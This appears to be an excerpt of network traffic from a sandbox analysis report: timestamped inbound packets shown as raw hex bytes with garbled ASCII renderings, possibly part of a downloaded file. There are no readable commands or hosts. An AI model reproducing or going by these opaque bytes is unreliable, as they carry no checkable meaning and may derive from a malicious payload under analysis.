2023-09-26 07:46:56 UTC	63	IN	Data Raw: c2 c1 0f 49 27 4f 51 eb b8 f4 3b 50 d9 b6 7d 1b 7a 82 e7 77 84 3b 45 4d 4c 52 9d 9b 82 69 f7 28 41 6c fd f7 3b fb 64 08 b1 eb ff 5e bd 41 14 c8 51 25 76 07 72 7c 49 dc ff bd d5 99 76 f1 78 2e 5e 42 29 77 17 7b c7 7d 16 27 e5 fd 9e 08 15 78 18 7c 03 de 40 b1 f3 78 ce 37 91 0e 9f a9 8e 00 e5 01 a3 c6 a7 2c 2b 82 47 74 14 82 31 aa b7 ff 3e 86 3e 6a 5d 65 8d 2c 85 f9 e1 48 3b bb a9 67 63 a0 d8 51 25 5f 9c 77 b6 9b 19 e3 e9 e6 7d dc c8 e6 8f f3 d1 2a 3b 85 4d fd 5e 87 f3 d3 14 2f 59 48 a0 9d 61 52 8d 07 d1 40 51 2d 42 4a 19 42 00 c8 99 08 11 8a 50 a7 6b e4 34 e1 1c 86 b4 66 1a 2f 69 ea 80 b0 cc 0b 56 3b 4c 1e 47 ce 54 95 3a 44 56 73 b1 7a d5 15 07 3b fb fb 85 88 b4 ae 2b fc f6 f3 9a e9 07 e1 8f 1f 97 84 88 35 6a 37 e6 9f d7 15 6f 6b 6e cb 2a 6c 9b e6 14 8e 53 Data Ascii: I'OQ;P}zw;EMLRi(Al;d^AQ%vr\|Ivx.^B)w{}'x\|@x7,+Gt1>>j]e,H;gcQ%_w};M^/YHaR@Q-BJBPk4f/iV;LGT:DVsz;+5j7oknlS
2023-09-26 07:46:56 UTC	67	IN	Data Raw: 65 59 8b 20 ec 4f 74 24 e2 d0 52 7e 91 33 f2 31 90 17 54 ce 0f af 00 7f d1 2f 13 ab 61 33 44 a5 88 3d 4a 40 e2 6f 3b 08 15 37 92 b2 93 5f 82 e5 c9 b4 c3 78 02 3d 45 42 63 2c 62 24 79 b4 d3 6e f1 3d 82 24 3d 4b 0b 07 e1 3d f2 a5 a9 c0 92 24 ab 61 2e cf 74 df 0f e6 6a c5 22 2e 89 29 0b 27 62 b4 ca 46 e7 2e 29 d8 07 87 89 22 56 fb 05 26 5c df 08 e5 04 3d 00 35 07 3d 0f 0d 9f b5 06 11 a5 b7 04 76 69 3e 77 d3 41 3d e5 36 e1 0c d9 ad 93 6c 6a a6 70 6f 22 25 32 55 03 4e e1 3f 82 77 61 c0 54 2e ea c7 81 d9 9e 3f 77 22 53 ff e9 60 32 68 12 d9 37 17 89 56 0b 33 8b 6b 49 c3 8b 2e 61 23 04 36 60 27 e9 24 82 6f 26 76 0b 7f fd 70 7d 37 51 ab 2c 9f 11 de 30 c0 77 72 9d 6f a2 27 71 ff 0e 2c 81 0a b1 ef a0 90 8b 2e a0 3d 88 e5 02 16 22 ac 21 b4 f8 70 89 6b fe 87 68 e8 60 Data Ascii: eY Ot$R~31T/a3D=J@o;7_x=EBc,b$yn=$=K=$a.tj".)'bF.)"V&\=5=vi>wA=6ljpo"%2UN?waT.?w"S`2h7V3kI.a#6`'$o&vp}7Q,0wro'q,.="!pkh`
2023-09-26 07:46:56 UTC	72	IN	Data Raw: 8a 3e 6a 65 39 87 23 67 8f a3 27 67 93 82 0b 29 3b 04 4a 24 21 42 5e db f4 68 81 c1 7b 07 70 e4 ba 09 fe e0 34 50 d0 15 4e 06 20 63 02 87 2d 15 55 02 4c 51 b2 56 b3 3d ff 4d 74 e1 3d fd e4 66 4b 26 d9 b0 7e a8 a3 05 7f 07 af e3 1b 02 24 61 47 8f 4e a0 3d 88 22 60 ff 00 96 60 b4 e7 7b a2 f3 43 24 61 6a 89 ca e0 d3 43 a6 a6 93 47 d2 e0 ab 83 29 e9 3e 0e af 60 52 86 2e ea 3d 0d a5 a1 27 89 64 6f 37 81 f7 61 bf 83 af 2c db c5 28 24 3e 10 a6 67 3e 1d 26 0b 37 8f b2 34 e7 e2 10 85 5f 38 c6 30 5f 12 2f 20 58 b0 28 40 07 1a 29 d7 ff 02 a3 a1 4a 05 14 a1 d6 2f 67 c1 0c 68 66 ec 72 82 46 33 e3 47 86 64 e7 e1 55 30 d7 8a 03 64 ef 16 a3 b3 1d 07 25 41 3a c5 63 89 9a 21 2a 8d 1b 0e 63 89 9f 09 b2 01 38 46 b6 33 9d 1e 76 89 6f e7 20 a9 2b 87 ef 83 39 c9 04 3e df 81 e4 Data Ascii: >je9#g'g);J$!B^h{p4PN c-ULQV=Mt=fK&~$aGN="``{C$ajCG)>`R.='do7a,($>g>&74_80_/ X(@)J/ghfrF3GdU0d%A:c!*c8F3vo +9>
2023-09-26 07:46:56 UTC	76	IN	Data Raw: 1a 26 4e 2b 82 3a 71 ba 82 23 99 bf 07 da ea 77 06 26 64 b7 0a ad e3 be 49 76 89 01 80 6d 01 23 e9 00 8a 1b 16 3e 62 04 44 73 e3 70 1e b5 2e 6e 84 68 7e b4 4c 23 20 bf 4c cd 0b b4 57 42 61 1b 62 73 e1 2f 5e 26 4b 67 82 23 35 bf 07 76 34 bf 07 6a e1 3a 4a a6 64 7b 82 23 21 6a 82 23 5d bf 07 1e e1 3a 36 a6 64 0f 57 a6 64 13 82 23 49 bf 07 02 e1 3a 22 13 a1 3d 1e e6 63 27 c2 24 22 65 68 2d a4 b9 25 81 a1 5d 81 e2 05 be 25 ea 2a ab 8f cf 2b 1b 09 e5 2a d6 d4 e6 2b ba 82 6a 68 b6 4e 4f ea 72 56 26 77 1c bd bf 25 49 89 64 65 fe 22 ad f0 1e 83 7c 33 d7 d1 c2 20 1d 56 cd 59 61 e9 7a 1e 7f c8 bc 60 4b 50 ce ff 9c c2 14 a1 28 d2 95 a6 58 7d ce ae 58 d2 44 ea 6a 5e 66 73 67 42 2e de 00 eb a7 5e 55 08 e0 45 30 c0 02 ab e7 c2 05 69 be ee b2 a1 3a 8f 63 75 b6 26 63 91 Data Ascii: &N+:q#w&dIvm#>bDsp.nh~L# LWBabs/^&Kg#5v4j:Jd{#!j#]:6dWd#I:"=c'$"eh-%]%++jhNOrV&w%Ide"\|3 VYaz`KP(X}XDj^fsgB.^UE0i:cu&c
2023-09-26 07:46:56 UTC	80	IN	Data Raw: 76 63 7d 71 86 6c d3 8b 73 b5 6e 52 f2 6c 5c 01 f2 91 00 a3 01 14 3d e9 53 e4 fc 25 fa f1 35 e6 76 89 22 c0 43 8a 4f b1 17 60 db 32 27 b9 8f 0e 05 46 ed 16 08 2d ed 16 76 6d 6e 35 3b 81 6b 29 63 63 cf 62 0a ea 72 de 25 2c cf a3 e4 68 e7 01 73 91 cf 0b cd ce 29 47 06 6f 00 e2 2f 88 67 fd f6 23 67 30 3d 51 20 ba 2d f2 28 72 36 31 d7 84 e7 c3 3a a2 21 99 bc eb 24 75 38 c2 6e 69 bc c3 24 30 6f d3 bf 75 13 ca fc fe 2b 99 32 b9 2e 8c ae 72 28 42 26 a3 5c c7 2d 3e 2c 04 e0 24 c3 82 6b a7 7a ff 7c 0b 3e f6 51 c1 3f 8f 6a 64 c3 ff 3c 03 66 04 04 74 60 04 e6 8a 4a 06 22 a0 dd c2 26 ec 7b 17 da 31 ff 2f 8f 73 a1 23 23 65 be 25 27 65 e2 12 cd 55 4e 46 6a 15 2c c3 04 14 10 53 0a d3 67 81 da 1c db 83 27 71 26 67 21 c5 84 1f 81 93 9f d0 b2 61 3a 54 71 fe 14 4d e6 37 ad Data Ascii: vc}qlsnRl\=S%5v"CO`2'F-vmn5;k)ccbr%,hs)Go/g#g0=Q -(r61:!$u8ni$0ou+2.r(B&\->,$kz\|>Q?jd<ft`J"&{1/s##e%'eUNFj,Sg'q&g!a:TqM7
2023-09-26 07:46:56 UTC	84	IN	Data Raw: 61 3e 52 40 e8 7d 38 23 63 7b 0b 24 21 1e 05 24 23 f8 47 e6 70 24 c5 63 7b 83 61 26 d9 5c 02 c7 56 3f ea 30 60 2f 21 af 24 f7 89 6b a9 b4 02 77 6d b6 57 e2 ea 7a c6 22 e2 ff 82 3a 8d b4 4f ca e8 ff 4f 96 ea 6a ee ad d1 35 d1 26 61 eb 89 73 b5 b4 47 ce e8 7b 40 0e 51 34 81 cf 63 df 02 40 e1 b6 48 02 ea 7a d6 40 61 3e 32 40 e8 77 24 f6 7e ce 6b 76 89 65 62 24 21 37 eb 47 90 1c 53 c5 e6 3c 02 6e 5d b6 4f da ea 6a fe 36 e0 05 52 63 f1 0f 06 15 a1 27 e9 23 d9 6d ae dd 05 bc ee 2e 40 ca 24 b9 11 a6 1b d0 47 ae dc 27 95 19 fe a5 1c c3 02 53 66 aa b0 25 8a 9f 71 da 82 38 93 e6 8e 38 a1 d2 65 4f 25 76 0b 3a a0 11 fa ef 15 27 33 3b fa ad 34 c7 81 1c 61 65 77 b6 18 c3 90 22 f1 46 fe 24 db 7a 94 da 56 3b f0 25 7d a9 03 2e 44 5f 02 cc 41 ee 7e ca 54 3c ee 65 dc 9f 10 Data Ascii: a>R@}8#c{$!$#Gp$c{a&\V?0`/!$kwmWz":OOj5&asG{@Q4c@Hz@a>2@w$~kveb$!7GS<n]Oj6Rc'#m.@$G'Sf%q88eO%v:'3;4aew"F$zV;%}.D_A~T<e
2023-09-26 07:46:56 UTC	88	IN	Data Raw: 3d 4f e6 0d df e9 a0 88 7e fd 72 9e c0 a1 07 23 39 3d b7 63 00 0e ee 09 a7 38 46 40 87 09 a7 7f 1b 01 a2 16 9b 46 2c a9 bc e8 24 03 32 0b 67 5c bc c0 45 60 77 52 a5 a0 8f 00 77 89 0c e1 28 c2 35 4f 40 66 ad 39 82 6b 2f 25 86 6b d7 01 8e 6b 3d 23 85 6b f9 47 da 2c f9 47 06 9c 65 68 27 db de 23 4d a3 1f 02 ab 2d 3a fe c5 fa 6f 52 6e 89 e3 71 84 65 55 03 84 44 fe 42 c7 61 b2 56 2b 9d d9 0c 27 59 6e ea 9d 62 3b 01 ad 23 48 53 46 62 db 01 46 63 3c 48 7e 30 d7 9a 2d 22 3b 41 35 02 dc 15 37 33 d7 a2 24 c6 fd 00 a5 1c db 02 52 72 34 a3 0c e7 00 2e a4 5e 8f 03 79 3f 18 04 ab 65 3f e5 bb 29 67 40 95 62 77 12 06 72 6f 26 47 e3 77 3a af 65 6f 3e c4 6e 1b 50 ad 20 1f 42 76 09 e1 cc 98 cf df 03 77 01 d7 b5 3a 61 3f 20 be 20 55 05 16 53 ff eb 84 60 4c 6c a0 91 c9 a9 22 Data Ascii: =O~r#9=c8F@F,$2g\E`wRw(5O@f9k/%kk=#kG,Geh'#M-:oRnqeUDBaV+'Ynb;#HSFbFc<H~0-";A573$Rr4.^y?e?)g@bwro&Gw:eo>nP Bvw:a? US`Ll"
2023-09-26 07:46:56 UTC	92	IN	Data Raw: 26 ce 64 3f 08 4e 6b 3e 26 63 9d 3f 52 ce d5 6d fd d9 e2 fb 20 2e 60 9b 53 5e d9 3d 47 ee 66 17 8f aa 6b 3a 47 6f 66 07 ce 7f 60 3e 08 de ea 72 0e ce 36 64 c3 26 54 42 fa 26 15 2c 02 36 62 88 02 ad 70 b4 40 0a 9e ef 81 06 a5 3b 81 5b 95 3e 0e 6b 95 35 53 a7 2c 3d 02 2b 30 13 fd f4 5c 3d 0e da 60 33 02 1d e3 b6 83 b3 4d c0 00 f7 61 33 b2 27 ea da 5f e5 63 f3 04 26 34 b4 ee a5 8d 23 23 a4 f7 4b 83 c7 61 3f 47 52 66 5f b2 27 88 61 03 a7 28 3f 2b a5 c1 47 5a 26 15 34 06 8a 55 3c 0c 04 20 3f 0c e1 24 cb 02 46 61 57 82 a4 6d a2 6b ab 24 cb 00 15 21 6e 7a 74 89 03 ab 27 13 33 c3 23 a8 38 30 e6 88 2d 02 31 e5 bd 07 22 3f 1b 00 78 e8 7a fe 4e ab b4 82 07 e7 6f 26 a4 31 b6 47 de e2 29 c2 73 9d 6d ea a6 30 bd 9b a5 72 5f 47 de 31 d7 6d 25 69 bc 1b 2c 39 be c3 c6 60 Data Ascii: &d?Nk>&c?Rm .`S^=Gfk:Gof`>r6d&TB&,6bp@;[>k5S,=+0\=`3Ma3'_c&4##Ka?GRf_'a(?+GZ&4U< ?$FaWmk$!nzt'3#80-1"?xzNo&1G)sm0r_G1m%i,9`
2023-09-26 07:46:56 UTC	95	IN	Data Raw: 25 61 4b 0d 40 6e 20 46 26 61 2d 43 e6 63 4a f8 e6 65 b4 44 2a 63 6e c0 07 e8 79 1e a3 a1 4a 02 2a e2 71 36 24 53 ff 5d 24 3f be 3b d9 17 27 fd 50 75 3f 52 ce 51 7a fd d9 52 ed 43 a6 21 06 54 06 17 29 e0 21 ea 3f 4c 3a ea 79 26 17 65 2e 02 a5 a3 3b 39 70 41 4d ed 26 e2 42 0a 26 32 b4 5f 2a 61 4a 2a 4e ee 48 6d 4f ec 3f 44 0a e8 0c 52 71 89 9b a0 b0 03 18 8b 60 49 bf 09 2b e1 34 12 22 53 ff 59 85 6a b4 44 0e 61 b4 4c 0a ea 41 1a 25 1f 3d 16 26 0b b2 44 1a 31 b4 04 26 0b 7f 53 71 e8 72 12 d9 6b ef c2 23 69 ff 07 27 53 e4 e9 26 7b c0 77 36 e8 41 2a d9 61 4a fe 71 89 9a 46 d9 9e 3a 02 21 32 7e 14 36 eb e7 f4 60 61 0f 03 53 75 0c cb 1f 2f 37 2e 50 6c df 00 e0 65 3e 02 a6 20 04 4c 0a 13 cc 89 e7 78 5f 76 2f 31 b4 44 a6 68 ff 19 ac 9f fc c6 28 20 7f 1d 26 7e 3f Data Ascii: %aK@n F&a-CcJeDcnyJq6$S]$?;'Pu?RQzRC!T)!?L:y&e.;9pAM&B&2_aJNHmO?DRq`I+4"SYjDaLA%=&D1&Sqrk#i'S&{w6A*aJqF:!2~6`aSu/7.Ple> Lx_v/1Dh( &~?
2023-09-26 07:46:56 UTC	99	IN	Data Raw: d7 ef 87 f4 14 57 3b 4e f4 ff 07 4c 61 5e 43 2e e9 35 86 47 08 bb c2 0b e2 fb 0a ab 21 72 d6 77 0b 7f 8f 06 68 b2 46 63 a5 9e 05 ad 70 6d e0 2a 49 3f fd f7 e8 7a ee a5 1c d3 62 26 15 3a eb 45 c1 6c e3 2d 23 3f 0a af 24 fb 89 6c 6d b6 06 6b a9 fd 03 02 e8 7a f2 ad c5 72 f2 44 6e 7d 22 e6 66 f7 42 27 6b fb 00 2e 69 be 00 a5 a3 6b 50 3e 89 bf 05 62 70 de 90 02 ec 72 28 c6 41 3c f2 a5 6d 1f c9 23 ea 7d 2a 0a 9e ef a5 28 8c 7e 22 6b 69 27 0d 90 f0 be 74 05 67 33 53 ad 35 6f 0a 65 60 3b 41 20 1d 59 1c 41 62 bf 75 26 6c b7 47 d9 a6 7a ce 73 60 1b 68 a5 77 3b 24 22 f4 7d 13 2a 60 9d 00 76 e2 df 00 29 e5 40 83 45 6d b4 53 76 e0 dd 02 87 c6 3b 87 4b 64 10 1a af 2c 83 89 86 31 23 8b 73 a1 fd 03 62 a2 32 72 1a 31 d7 5d 06 65 7f 25 e7 67 b6 0b 27 e8 d7 1c 46 10 b6 47 Data Ascii: W;NLa^C.5G!rwhFcpmI?zb&:El-#?$lmkzrDn}"fB'k.ikP>bpr(A<m#}(~"ki'tg3S5oe`;A YAbu&lGzs`hw;$"}*`v)@EmSv;Kd,1#sb2r1]e%g'FG
2023-09-26 07:46:56 UTC	104	IN	Data Raw: 32 76 4e 8c 4e 3e 9a f1 17 72 1a c0 02 83 48 a5 9e 39 cd 5d cf 3e 6e 01 3d 22 37 35 4e 63 26 ed 1b 5a 46 61 5d 3f d7 61 69 82 71 52 c9 8b a2 45 f7 f2 22 6c 8f 10 1e c0 17 93 29 ec 63 26 1a 44 3f 3e ea d1 3f e9 2e c1 31 22 ad 61 43 26 02 e2 43 26 32 02 6a 52 21 8d 6e 05 60 32 38 89 06 2f bc 22 cd 65 bc ed 22 01 2f 22 ad 65 24 8b 56 63 b4 3d ad b2 14 62 f1 28 bc f8 2c 60 6f 12 27 4d 6e b2 27 55 42 1a 06 69 5f b3 21 36 0f 52 73 89 48 b2 75 51 26 eb 71 60 4f 02 ad a7 0c d0 e7 81 38 02 0d a7 b2 06 66 ec 33 82 06 ec 7b 8c 27 d8 4f 00 26 44 7b fd 59 63 69 2a d1 90 4f 21 32 79 b4 56 9b 30 33 23 22 ea 33 92 27 c1 3a 1e cd 43 bc f8 27 14 3f 09 ab 75 04 d3 dc ea 7b 82 b3 61 d4 06 ad 25 a2 23 28 c8 0d 00 32 e0 ff 56 3a 81 38 12 04 7f 6e 12 3f ec 4b 87 d6 29 82 b3 05 Data Ascii: 2vNN>rH9]>n="75Nc&ZFa]?aiqRE"l)c&D?>?.1"aC&C&2jR!n`28/"e"/"e$Vc=b(,`o'Mn'UBi_!6RsHuQ&q`O8f3{'O&D{Yci*O!2yV03#"3':C'?u{a%#(2V:8n?K)
2023-09-26 07:46:56 UTC	108	IN	Data Raw: 00 79 63 63 5c e4 69 3f 89 57 69 1f 87 d0 6b 37 3c 1d 98 4b 03 af 66 79 06 6e e2 c7 01 51 63 01 82 68 71 c0 26 a3 5d 12 02 66 61 ba d0 52 57 bc f8 26 60 4a 0d ad 20 3b c5 60 65 3b 01 a6 55 b6 44 2a 8a 2d a2 a5 9b 3d 77 e3 a2 3b 06 e5 65 7e 46 29 17 f9 5d 15 a1 7e 11 77 6d d7 15 66 46 7f 40 d0 b9 24 c2 26 3e bc e2 25 3f bc c2 d8 e2 ff 07 66 72 4b 0a 79 e2 f7 81 3a e1 69 0e ad 26 3b 39 f6 26 3b 4a 77 89 df 03 aa 27 33 42 28 e4 7f c2 51 49 69 ea 96 e3 4a 06 26 e5 ff 76 3d ea 79 52 ad a1 71 4e 1d a0 43 13 e6 7c 3e 90 d0 3e 3d 60 e7 6c 60 00 b0 20 3d 82 00 7a 27 48 59 64 2b 77 a1 68 79 0e 25 7a 7c f1 32 7a be 1b 79 d9 be 38 25 7a 3e 40 67 63 3f 8f 6f 61 c7 2e 66 61 26 37 e6 61 54 c2 26 ad ff 02 e3 06 be 7a 27 a3 58 71 2c ea 77 3a a3 a8 bf 7c 25 53 ff c1 96 60 Data Ascii: ycc\i?Wik7<KfynQchq&]faRW&`J ;`e;UD*-=w;e~F)]~wmfF@$&>%?frKy:i&;9&;Jw'3B(QIiJ&v=yRqNC\|>>=`l` =z'HYd+why%z\|2zy8%z>@gc?oa.fa&7aT&z'Xq,w:\|%S`
2023-09-26 07:46:56 UTC	112	IN	Data Raw: 32 93 d7 02 1d b3 3e 39 73 61 78 02 1d 9b 43 eb 15 a1 b5 47 a6 61 04 fa 58 76 55 01 a7 6e 35 d0 a7 6e f6 83 29 2c 3f 4d 1d 09 c6 7d cf e2 74 b9 26 6a 3f 2c 1a a8 3f 0e 63 29 3e 29 53 c6 be 8a 26 34 8b 2a 23 e0 e9 4b 27 27 bf d1 0e e2 ee 02 15 a8 0c ef ab e7 bf 04 07 61 6b 4e 02 75 b6 01 63 45 b4 02 a0 15 3d 02 26 5a d7 0d 2e ec 40 05 26 05 42 33 1d 99 3a 82 45 41 ff 02 3e 1d 38 8f 5e f7 c0 03 24 21 2a 12 26 54 ab 33 27 6e 3f 39 f6 1d 32 6a 98 6a 3f 02 26 89 34 db 26 61 bc c6 a2 65 bc 02 64 67 30 87 e7 a1 39 12 ad a6 14 c7 66 1d 0d 0d a3 4f 8c 43 25 e1 26 42 14 e5 bd 0f ab e9 3d 90 26 2b bc c2 00 ea ee c3 26 83 38 01 f7 ea f7 c3 c7 71 38 8f 1a 37 ff 9b 46 62 f7 02 40 ea 3b 51 15 b3 b2 2e 36 af 1a fd d9 60 31 87 26 eb 3f 16 21 30 6d 54 ce b6 d8 03 e4 59 53 Data Ascii: 2>9saxCGaXvUn5n),?M}t&j?,?c)>)S&4#K''akNucE=&Z.@&B3:EA>8^$!&T3'n?92jj?&4&aedg09fOC%&B=&+&8q87Fb@;Q.6`1&?!0mTYS
2023-09-26 07:46:56 UTC	116	IN	Data Raw: 61 02 3d 26 15 60 64 1b 3a 3f 02 52 38 59 3f 7b 61 4b 02 75 07 02 7e 26 15 72 64 26 5c 10 02 53 6b 59 8b 20 61 bc c4 24 52 c0 e9 1b 07 1f 3f 08 61 4a 1f a6 0c 0c 81 76 9e 36 7f 2b e2 3e bd e7 72 d4 06 07 de ad 11 3c e2 c0 0e 5b 61 2a 81 d9 69 4b 12 76 26 07 ea d0 b1 0d 2e 55 63 af 0e 63 61 b7 81 e3 63 9f 0e 29 e4 05 e2 e3 f1 59 c5 20 61 2f 0d ad a2 0d 0d 64 32 ad 2a 36 df 5b 67 56 db f8 02 ac 71 b5 1c ac ab 05 d1 26 14 21 86 ef 15 29 88 76 b1 3e 88 78 60 cd 02 28 61 13 c2 22 61 bb cb 53 bd 0c c2 cd 64 1f 19 e6 e2 e7 fd 16 cb 26 6a 34 cd 0f b3 4e 51 ff 01 ce 73 fa 0b b4 17 bc ca 46 c7 64 c1 73 0b 1e 52 a6 36 d7 6f 97 51 68 37 ae aa 9f af d6 f5 1b 32 76 ea c7 a2 bb c1 10 00 9d 50 41 76 48 ea 79 4e 73 78 ef 26 80 1c 3d 50 b6 53 6d a3 ba 62 ff 00 a6 61 30 89 Data Ascii: a=&`d:?R8Y?{aKu~&rd&\SkY a$R?aJv6+>r<[aiKv&.Uccac)Y a/d26[gVq&!)v>x`(a"aSd&j4NQsFdsR6oQh72vPAvHyNsx&=PSmba0
2023-09-26 07:46:56 UTC	120	IN	Data Raw: fc 6a 4a 21 3c 2a 73 89 23 a3 20 91 9e 04 d0 14 df 14 71 89 a8 c4 e4 53 3d 0e 03 64 3f 68 26 0b c0 54 71 89 a9 43 26 e0 68 89 fe 89 4b 42 22 37 2b ea 48 63 3a 1a 06 7b 24 87 fd 65 4a 15 66 20 77 50 ce 38 a1 29 04 7b 7a 63 16 01 6e 44 65 63 ba d9 26 15 38 81 dd 6b b4 c1 53 9b db e3 31 6f da 15 c5 46 df 4f 42 47 3f 8b 32 3f 49 67 03 6c 3f 29 20 44 c0 f8 d9 80 3e 32 86 5d 3a 04 84 30 5f 04 a6 64 2b f0 bb a0 34 0a cd 5e 6c 54 71 71 b4 3f 86 14 3f 7e d9 6e bb 04 a5 00 18 27 8d e2 fe 09 77 89 6b 9f 97 21 21 da a4 73 4a e2 40 3a 29 c1 a5 64 51 a9 dd 08 94 ea 01 06 3e 40 5f 5d 10 76 6d 5d 05 76 a6 26 03 5e 52 22 80 9e 66 49 bc 64 2d c1 39 f5 ad b0 b4 f9 26 63 9f f0 88 ea f5 4d 85 66 f5 a0 21 21 d4 15 4c 6d d7 27 cb 6f f9 72 25 61 80 92 63 69 1a 0d 50 69 d7 1c 63 Data Ascii: jJ!<*s# qS=d?h&TqC&hKB"7+Hc:{$eJf wP8){zcnDec&8kS1oFOBG?2?Igl?) D>2]:0_d+4^lTqq??~n'wk!!sJ@:)dQ>@_]vm]v&^R"fId-9&cMf!!Lm'or%aciPic
2023-09-26 07:46:56 UTC	124	IN	Data Raw: 29 22 40 c8 02 05 e3 c4 02 37 93 91 89 ec 2e 3b 2b a2 ea fc 00 0d 3e 61 5f 7d 61 6e 06 e5 f1 3d 02 ad 25 1b 06 ad 61 32 de 53 25 3f 54 76 30 3f ea 38 9e c0 fd ad 91 9e 0a 56 17 7b 03 52 e4 ff 76 28 61 69 6a 0a 0b 7c 02 ce 84 3d 92 25 e7 6b 26 2a 33 d7 9c 24 cb 3f aa 62 45 2b 54 76 89 3f 6f b4 61 3f 54 ce c6 dd 06 d9 9e 3f b5 15 a1 61 c1 a5 61 d3 0a 75 ea 63 26 32 6e 3f ad 7a 45 27 89 6a 45 23 12 73 ea 12 42 26 46 69 31 e6 71 68 89 1b 25 3e 2e df 60 b6 12 62 45 2f 8b 26 73 b4 d1 53 f1 13 89 2b 61 3f 08 85 09 3e 00 b4 0d 3f 00 87 ad bf 47 85 55 bf 06 ae e8 32 fe 26 64 b6 2f 1e e0 3a 16 1b 5d be 0f 76 61 3d 89 2b 35 3e 83 24 91 34 f3 53 67 b4 c1 26 52 f6 e9 22 4a fa 19 e9 61 0c f4 1d 90 4d 23 51 65 2f 39 fe 17 24 02 1d 49 bc fb 2e 62 4b 0c 26 54 4b 0b a5 98 Data Ascii: )"@7.;+>a_}an=%a2S%?Tv0?8V{Rv(aij\|=%k&*3$?bE+Tv?oa?T?aauc&2n?zE'jE#sB&Fi1qh%>.`bE/&sS+a?>?GU2&d/:]va=+5>$4Sg&R"JaM#Qe/9$I.bK&TK
2023-09-26 07:46:56 UTC	127	IN	Data Raw: 27 dc 3f 12 16 68 68 ea 75 61 01 03 bb 2d 1b 82 3a ea fc 5f 7d e8 0e 01 b1 62 b4 c5 a6 7b 2b 81 ca 79 6c 57 06 37 0c f4 af 51 fe 12 a3 a1 17 55 53 6f 3f 0f 16 e1 50 8b 27 61 64 81 e2 79 fc 89 2e e4 57 cb af 2d 3f 4a 36 a1 bd c0 23 6b 34 82 49 23 39 03 27 11 30 86 80 64 6e 02 5a a0 b4 52 a7 23 78 43 7a e2 bb fd 27 a1 5b 22 29 ed b3 43 20 69 6b 26 6a 61 3a 0b a5 9e 3d 0a 29 ed 44 03 22 25 1b 42 e1 42 7e 28 67 63 7b 89 3e 21 3e 36 af 6b 63 c2 0f 49 7f 00 1e ea 3f 81 2e 99 c6 8b 26 47 4a 07 98 60 3e c3 2e 1d 1b 4a a5 9c c0 76 2c 69 ff 12 3c 21 6d 14 9e 9f c0 82 d9 9e bc c9 d9 a6 38 c2 27 67 c0 43 2c 63 30 15 e1 25 1b 1a 27 60 2a 81 dc 9e 4b 0c ab 75 3f 50 ad 75 ea 32 a2 22 3f 43 24 cc c9 0d a3 17 3d c2 34 74 3f e6 42 22 3f 87 f4 15 41 02 a5 99 c0 76 32 e2 c7 Data Ascii: '?hhua-:_}b{+ylW7QUSo?P'ady.W-?J6#k4I#9'0dnZR#xCz'[")C ik&ja:=)D"%BB~(gc{>!>6kcI?.&GJ`>.Jv,i<!m8'gC,c0%'`*Ku?Pu2"?C$=4t?B"?Av2
2023-09-26 07:46:56 UTC	131	IN	Data Raw: 68 cc a9 ce 71 2f 20 75 fd f8 07 a7 63 5e 0f 55 62 60 5c d4 3e 2d 59 02 6b 6c 57 d6 15 2f 54 ad ed 22 46 96 60 4e 30 32 0b 3f 52 4e 31 3f 00 4c 62 9f 08 21 c1 3f 00 16 e0 68 c5 63 71 3e 02 22 b2 b4 80 d6 31 aa 76 5f ea 22 06 f6 63 b6 12 0d 79 6f 73 3b 0b 33 54 36 50 1d 2e 05 63 c0 17 66 b3 25 78 53 0b 79 63 bd 30 fe 0c 1a 71 3e 62 3a 59 92 33 29 99 0f 79 d7 1a 27 41 3a 36 ff 01 b2 9e ec 52 39 69 cf 57 2a 60 4f 80 9c 36 27 01 12 92 31 f3 29 a0 2a c1 f4 67 3e 87 2f 61 3e 55 d9 b2 bc fa 9e 9e 4b 0d b6 63 1e 00 37 65 3b 12 22 4a 9d 00 d2 76 6e a4 1d ba 9f 39 e5 36 3f 8b 7a 45 2f 77 29 89 5a c9 e6 2c 5f 39 20 c0 3d 5b e5 b0 68 d6 1f 71 b5 46 1e 9e de a3 1a 4e 4b 02 22 5d 63 77 2e ea 7d 1a 26 6d 2f 8b 64 79 06 58 2e 61 4b 2a 1f 3b 2f 76 31 ea 7f 40 32 c9 3e 76 Data Ascii: hq/ uc^Ub`\>-YklW/T"F`N02?RN1?Lb!?hcq>"1v_"cyos;3T6P.cf%xSyc0q>b:Y3)y'A:6R9iW`O6'1)g>/a>UKc7e;"Jvn96?zE/w)Z,_9 =[hqFNK"]cw.}&m/dyX.aK*;/v1@2>v
2023-09-26 07:46:56 UTC	136	IN	Data Raw: 04 db 55 63 b4 c9 32 ea 02 53 25 e8 1d 0d ad b0 b4 40 d3 d1 70 f1 83 ea f5 60 22 e2 2f e3 25 92 9b d0 20 62 d7 29 04 b9 dd 07 76 89 1e 51 2d e4 e4 82 51 d9 62 5d 78 3a fc c3 86 60 3c 10 af 7c 8f 13 b2 da 3f 47 26 89 3f 4d 27 61 bc 02 e2 69 60 5c 7d a2 9e b2 26 70 7a 02 ad 6c f7 26 60 61 3f 8f 32 79 04 d3 50 70 3f 6a ae 18 7c 02 ce 2c 6f 88 26 61 b7 06 27 e9 b4 17 92 60 b3 02 52 45 2f 89 ed ec 03 00 26 ea fe c3 cf 63 cc a7 ad 61 f7 81 c7 62 cc a6 27 7c 34 03 a6 60 73 92 2d 61 6a 89 4a 45 3f 0a 70 36 b4 7e 02 75 87 02 8a 15 7b 02 4e 21 1a 46 66 61 6f ea 5b 12 3e 01 2c 34 7b ea 54 64 35 ea d9 39 3e 8d 32 61 0c f4 ce 37 1d 02 26 5d 3f 0f 53 65 8f 08 cd 69 03 02 2e 15 2f 3e 59 15 33 39 26 15 1b 1a 5b 6a b7 06 18 61 79 e9 23 e4 c9 7c 27 2f 7f 3e 2c 14 e9 a3 62 Data Ascii: Uc2S%@p`"/% b)vQ-Qb]x:`<\|?G&?M'ai`\}&pzl&`a?2yPp?j\|,o&a'`RE/&cab'\|4`s-ajJE?p6~u{N!Ffao[>,4{Td59>2a7&]?Sei./>Y39&[jay#\|'/>,b
